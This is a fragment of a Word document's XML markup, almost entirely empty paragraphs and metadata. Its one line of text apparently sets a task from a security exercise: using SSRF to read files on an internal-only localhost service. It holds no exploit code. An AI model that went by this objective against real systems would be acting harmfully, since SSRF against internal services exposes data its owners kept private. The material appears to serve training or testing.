    <w:p w14:paraId="5A4306BC" w14:textId="58663D6D" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654F6459" w14:textId="21E1D7B4" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00334C6F" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>For SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="0086143E">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>: read files on http://localhost:6566 (internal-only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB7716E" w14:textId="7E874606" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269655CF" w14:textId="7066A2F7" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C86C37C" w14:textId="4906394C" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED0FCDE" w14:textId="0281857A" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DEA4EF8" w14:textId="60E45C08" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33AB8AE1" w14:textId="56FBA9C3" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAC7762" w14:textId="666CA066" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705252ED" w14:textId="21444131" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5285A847" w14:textId="6C957D76" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DFB179F" w14:textId="64C5FD0F" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8A2189" w14:textId="40354CA0" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C97761" w14:textId="66F5BB99" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2AC3FB" w14:textId="0FAD6780" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6861F6" w14:textId="6182C047" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7017608C" w14:textId="4BDFC542" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629F4C1E" w14:textId="1437FE42" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4321D7E8" w14:textId="0464C663" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291B750B" w14:textId="1D65FFDD" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D158518" w14:textId="6D9FD251" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27545D25" w14:textId="6A8627AF" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37AD5D36" w14:textId="10DDA508" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2210D12A" w14:textId="7A350701" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5AADE4" w14:textId="34CDFFD6" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DDC7FD2" w14:textId="6F207546" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B400467" w14:textId="71F5B490" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1CEDA6" w14:textId="42D5E487" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22ACE630" w14:textId="5E077C6D" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603D5C41" w14:textId="2D0910B7" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD313EC" w14:textId="6FB01D99" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526C60C1" w14:textId="22C8B4CA" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08CC79B6" w14:textId="2765E3CE" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE12184" w14:textId="79CF89F5" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EC875F" w14:textId="72121BA7" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BBBD532" w14:textId="2FEEBF00" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752222B0" w14:textId="77777777" w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidRDefault="00012F12" w:rsidP="00012F12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00012F12" w:rsidRPr="0086143E" w:rsidSect="00012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368"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B98C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E1B23"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6780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71042"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C78E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303299">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1123772536">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="41320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012F12"/>
    <w:rsid w:val="00012F12"/>
    <w:rsid w:val="0002514C"/>
    <w:rsid w:val="000D0E47"/>
    <w:rsid w:val="000D3305"/>
    <w:rsid w:val="00154C7B"/>
    <w:rsid w:val="001D18F4"/>
    <w:rsid w:val="00296B56"/>
    <w:rsid w:val="002E54E6"/>
    <w:rsid w:val="00334C6F"/>
    <w:rsid w:val="00396902"/>
    <w:rsid w:val="003B4081"/>
    <w:rsid w:val="004F6531"/>
    <w:rsid w:val="00567ABE"/>
    <w:rsid w:val="00740004"/>
    <w:rsid w:val="008240DE"/>
    <w:rsid w:val="00830754"/>
    <w:rsid w:val="0086143E"/>
    <w:rsid w:val="008E640E"/>
    <w:rsid w:val="00907FFA"/>
    <w:rsid w:val="00972D3A"/>
    <w:rsid w:val="009A4381"/>
    <w:rsid w:val="00A27B17"/>
    <w:rsid w:val="00A40A64"/>
    <w:rsid w:val="00AA57F7"/>
    <w:rsid w:val="00B26E36"/>
    <w:rsid w:val="00C37CB7"/>
    <w:rsid w:val="00CA2154"/>
    <w:rsid w:val="00D573F8"/>
    <w:rsid w:val="00DE3717"/>
    <w:rsid w:val="00E83C31"/>
    <w:rsid w:val="00E916F4"/>
    <w:rsid w:val="00E95E1E"/>
    <w:rsid w:val="00F14004"/>
    <w:rsid w:val="00F93540"/>
    <w:rsid w:val="00FA33DD"/>
    <w:rsid w:val="00FA42DB"/>
    <w:rsid w:val="00FC3492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817BD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C309F1D3-20A2-4D84-98FF-6AC569AB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yperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E91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19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-25T07:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-28T14:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>